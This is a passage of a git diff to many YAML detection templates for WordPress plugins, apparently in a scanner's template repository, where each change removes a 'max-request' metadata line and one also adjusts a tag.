b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..56d2e4efcd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,10 +7,9 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 http: - method: GET diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: 